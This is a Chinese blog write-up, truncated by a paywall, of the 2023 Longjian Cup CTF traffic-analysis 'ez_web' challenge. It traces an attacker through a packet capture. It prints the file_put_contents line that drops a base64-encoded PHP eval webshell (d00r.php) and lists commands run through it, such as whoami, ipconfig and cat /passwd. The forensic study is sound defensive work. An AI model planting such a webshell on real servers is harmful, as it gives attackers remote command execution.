2023陇剑杯-流量分析篇(全)-wp详细

置顶 已于 2024-05-07 15:18:11 修改
阅读量1.8k 收藏 15
点赞数 8
分类专栏: CTFer 文章标签: 安全 网络
于 2024-05-06 16:49:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_40667448/article/details/138492210
版权

1.ez_web

Q1:服务器自带的后门文件是什么?
常用http过滤命令:
    http.request.full_uri
    http.request.method==POST

        查看第一个POST请求,发现关键点file_put_contents(备注:file_put_contents内置函数,用于将字符串写入文件)分析可知,攻击者首先通过ViewMore.php写入一句话木马d00r.php,然后通过d00r.php执行系统命令,具体分析如下:

file_put_contents('d00r.php', base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg=='));,

file_put_contents 函数将经过Base64编码的PHP代码写入到一个名为'd00r.php'的文件中。 PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg== base64解码后对应的PHP代码为

<?php eval($_POST['cmd']);?>(经典的php一句话木马)

然后通过一句话木马文件d00r.php执行whoami,ls等一系列系统命令。

因此服务器自带的后门文件是ViewMore.php。

Q2:服务器的内网IP是什么?

如下所示:第22251个流,追踪http数据流,

查看ipconfig的回显,发现内网ip地址为:192.168.101.132

Q3:攻击者往服务器中写入的key是什么?

追踪http数据流,将cmd执行命令进行url解码,分析可知file_put_contents 函数将解码得到的数据写入到名为k3y_f1le的文件中,

base64解码发现:PK开头,直接保存为1.zip 

压缩文件存在密码?

继续查看POST请求包,追踪23473流发现执行了cat /passwd命令,猜测响应值为密码

最低0.47元/天 解锁文章
2023陇剑线上&线下赛数据分析
大博的博客
12-14 1731
好久没打过比赛了,对于这种偏蓝方的比赛我还是很喜欢 本文首发于:先知社区:https://xz.aliyun.com/t/13177more。
陇剑部分wp(参赛总结与反思)
cuddlylm的博客
10-17 670
1.签到 网管小王在上网途中发现自己的网络访问异常缓慢,于是对网络出口捕获了流量,请您分析流量后进行回答:(本题仅1小问) 此时正在进行的可能是___http___协议的网络攻击。(如有字母请部使用小写,填写样例:http、dns、ftp) 看请求包,协议为http,版本为1.1 2.jwt 昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答: 这题要先了解什么是jwt JSON Web Token (JWT)是一个开放标准(RFC 7519),它定义了一种紧凑的、自包含的方式,用于作为JS
陇剑2023WriteUp学习笔记【初赛】
L120305q的博客
09-04 2711
陇剑2023初赛wp学习笔记
2025平航WP(除流量分析
最新发布
qq_51471650的博客
04-22 2056
2025年4月,杭州滨江警方接到辖区内市民刘晓倩(简称:倩倩)报案称:其个人电子设备疑似遭人监控。经初步调查,警方发现倩倩的手机存在可疑后台活动,手机可能存在被木马控制情况;对倩倩计算机进行流量监控,捕获可疑流量包。遂启动电子数据取证程序。 警方通过对倩倩手机和恶意流量包的分析,锁定一名化名“起早王”的本地男子。经搜查其住所,警方查扣一台个人电脑和服务器。技术分析显示,该服务器中存有与倩倩设备内同源的特制远控木马,可实时窃取手机摄像头、手机通信记录等相关敏感文件。进一步对服务器溯源,发现“起早王”曾渗
2023陇剑
qq_64201116的博客
09-18 1641
​首先判断哪个是服务器地址​从响应包看,给客户端返回数据包的就是服务器所以确定服务器地址是​再从开放端口来看,长期开放的端口​所以就是80、888、8888。
2023第二届陇剑wp(ak)
Ahi0upsec的博客
08-28 3846
ak数据分析部分wp
AGCTF 2023陇剑wp
akxnxbshai的博客
09-01 1062
前几天的比赛,有空发一下。
2023陇剑IR -- wp(超详细
z2414_sxs的博客
02-27 1690
2023陇剑IR -- wp(超详细
2023陇剑EW-Write Up
qq_41247797的博客
08-28 2367
通过流量分析黑客的入侵过程
2024长城-第五场-流量分析wp
qq_67760645的博客
04-11 2116
查看了一下流量包里的协议包,发现只有TLS协议进行了加密。使用冰蝎4.0自带的解密脚本进行解密,协议名称那里根据前面发现的代码判断出是xor+base64。先把这段数据放入冰蝎进行解密,然后把这个cmd变量的这段base64进行解码,发现将这段串数字输入到文件中,文件名带有passwd。得到了flag{Keep_going_jpg},但是这个flag是错误的。但是这个flag里面的内容就是图片的文件名+文件后缀。说明解题还是看这个图片。查看那个key文件,拖入十六进制查看工具发现这个是RSA加密的key。
2021年“陇剑“部分WP
mwmbfh的博客
09-15 2074
2021年"陇剑"部分WP一、 战队信息二、 解题情况三、 解题过程题目3.1题目3.1操作内容题目3.1flag值题目7.1题目7.1操作内容题目7.1flag值题目8.1题目8.1操作内容题目8.1flag值题目8.2题目8.2操作内容题目8.2flag值题目8.3题目8.3操作内容题目8.2flag值 一、 战队信息 战队名称:fuller 二、 解题情况 三、 解题过程 题目3.1 题目3.1操作内容 使用wireshark打开题目文件,使用筛选条件,选择发送的数据。 Ø
2021 [线下]陇剑 wp
qq_45603443的博客
09-29 8065
2021 [线下]陇剑 wp前言1.11.21.31.41.53.13.34.14.25.15.2Tip 前言 wp由EDI yanshu师傅投稿 ,感谢yanshu师傅。 部分题目为赛后复现。 部分题目复现方法由一些师傅提供解题思路,感谢。 题目附件获取方法在文章末尾。 1.1 导出对象 发现 6.html 中有颜文字 解开后 alert(“EBA01E64-416C-419E-9C9A-C807AD9741D2”); 1.2 局搜X-Forwarded-For,会发现它ip是五位的,答案
陇剑jwt流量分析
m0_57696734的博客
07-17 623
陇剑jwt
流量分析——陇剑 2021【签到、jwt】
m0_74559567的博客
02-23 1299
其中,CFLAGS变量包含了一些编译选项,如-Werror和-Wall,分别表示将所有警告视为错误和开启所有警告。接下来的规则定义了如何从"looter.c"源文件生成"looter.so"共享库。这段代码是一个PAM模块的示例,用于在Linux系统中进行身份验证,并将用户名和密码保存到文件中。还可以解码进行验证,直接能识别到用JWT进行解码了~~~之后的流中显示的信息是没有成功攻击,继续往下分析。查看token的信息,明显的jwt认证方式。分析第16-21流,得知编译后的文件名是。
陇剑学习流量分析
weixin_44687621的博客
09-18 782
JWT 使用wireshark打开附件,追踪HTTP流。 分析这个JWT字段,到jwt.io下面去解出来 追踪TCP流,到第10个TCP时,我们可以发现这里实现了命令执行,输出了当前服务器的权限。 获得命令执行接口后,上传了一个c文件到tmp目录下。 上传该c文件后,使用makefile操作将这个c文件编译成恶意的so文件。 CFLAGS += -Werror -Wall looter.so: looter.c gcc $(CFLAGS) -fPIC -shared -Xlinker -x -o
CTFHub 异常的流量分析 WP
qq_61993117的博客
09-02 728
异常的流量分析wp
记一次流量分析实战——2021陇剑(webshell)
热门推荐
Battery的博客
08-15 14万+
1.分析数据包hack.pcap,黑客登录系统使用的密码是________。2.分析数据包hack.pcap,黑客修改了一个文件日志,文件的绝对路径为________。3.分析数据包hack.pcap,黑客获取webshell之后,权限是_________?4.分析数据包hack.pcap,黑客写入的webshell文件名是_________。5.分析数据包hack.pcap,黑客上传的代理工具客户端名字是__________。......
第二届陇剑2023线上wp
5L2g556F5ZWl77yf
09-07 1290
题目内容:服务器开放了哪些端口,请按照端口大小顺序提交答案,并以英文逗号隔开(如服务器开放了 80 81 82 83 端口,则答案为 80,81,82,83)半开放扫描端口开放状态。
2023陇剑SSW部分题目WP
qq_41247797的博客
08-28 1184
陇剑数据分析题目,考察从流量包分析黑客入侵的过程
提高博客用户体验:WP-UserOnline插件详细介绍
通过以上知识点的详细说明,我们可以了解到WP-UserOnline插件的安装、配置、应用以及展现方式。对于WordPress网站管理员而言,了解这些内容将有助于更好地管理自己的网站,并为访客提供更丰富的功能体验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值